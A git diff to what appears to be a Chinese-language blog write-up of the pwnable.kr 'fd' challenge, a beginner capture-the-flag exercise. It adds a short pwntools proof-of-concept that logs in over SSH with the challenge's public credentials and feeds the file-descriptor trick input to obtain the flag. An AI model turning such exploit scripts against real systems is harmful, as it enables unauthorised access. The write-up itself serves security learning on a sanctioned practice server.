--- a/_posts/2019-08-07-Pwnable-01-fd.md
+++ b/_posts/2019-08-07-Pwnable-01-fd.md
@@ -57,8 +57,18 @@ accent_color:          '#4fb1ba'
   fd == 1为标准输出
   fd == 2为标准错误输出
 ```
-### 解答：
+## 解答：
 
 先输入0x1234的十进制即4660，然后再输入LETMEWIN
 ./fd 4660
 LETMEWIN
+
+## poc
+```python
+  from pwn import *
+  pwn_ssh=ssh(host='pwnable.kr',user='fd',password='guest',port=2222)
+  print(pwn_ssh.connected())
+  sh=pwn_ssh.process(argv=['fd','4660'],executable='./fd')
+  sh.sendline('LETMEWIN')
+  print(sh.recvall())
+```
